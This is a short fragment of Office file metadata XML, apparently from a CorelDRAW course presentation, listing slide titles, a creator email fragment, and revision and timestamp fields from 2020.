      <vt:lpstr>CorelDRAW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课后作业</vt:lpstr>
      <vt:lpstr>总结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79832187@qq.com</dc:creator>
  <cp:lastModifiedBy>Microsoft Office User</cp:lastModifiedBy>
  <cp:revision>198</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-06-09T07:46:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-23T06:03:39Z</dcterms:modified>
</cp:coreProperties>
</file>